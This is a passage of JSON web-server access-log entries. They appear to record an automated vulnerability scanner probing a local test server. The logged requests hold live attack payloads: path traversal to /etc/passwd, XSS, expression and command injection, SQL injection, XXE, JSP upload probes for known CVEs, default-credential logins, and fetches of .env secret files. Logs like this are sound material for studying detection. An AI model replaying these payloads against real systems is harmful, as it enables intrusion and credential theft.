Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /camunda/app/welcome/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KD23Bl7x4qYF7G3zrTvcAh0nm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/Dashboard.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/pdf-invoices/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/getagent.cgi?type=s&xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-----------------------------250033711231076532771336998311\x0D\x0AContent-Disposition: form-data; name=\x22../../../../repository/deployment/server/webapps/authenticationendpoint/29kd1y1oibrtwkocusbjpbmbabk.jsp\x22;filename=\x22test.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<% out.print(\x22WSO2-RCE-CVE-2022-29464\x22); %>\x0D\x0A-----------------------------250033711231076532771336998311--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileupload/toolsAny HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owncloud/config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm-web/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/console?.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\x22num\x22;s:72:\x220,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -\x22;s:2:\x22id\x22;i:1;}", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base_import/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationendpoint/29kd1y1oibrtwkocusbjpbmbabk.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"\x0D\x0A]>\x0D\x0A\x0D\x0A\x0D\x0Aaaaaa\x0D\x0A&xxe;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Autodiscover/Autodiscover.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"requester=login&request=login¶ms=[{\x22name\x22:\x22input_id\x22,\x22value\x22:\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\x22},{\x22name\x22:\x22input_passwd\x22,\x22value\x22:\x22PASSWORD\x22},{\x22name\x22:\x22device_id\x22,\x22value\x22:\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\x22},{\x22name\x22:\x22checked\x22,\x22value\x22:false},{\x22name\x22:\x22login_key\x22,\x22value\x22:\x22\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /http/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web.config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /s/sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"_fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userpost/xerox.set HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vpn/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.axiom/accounts/do.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 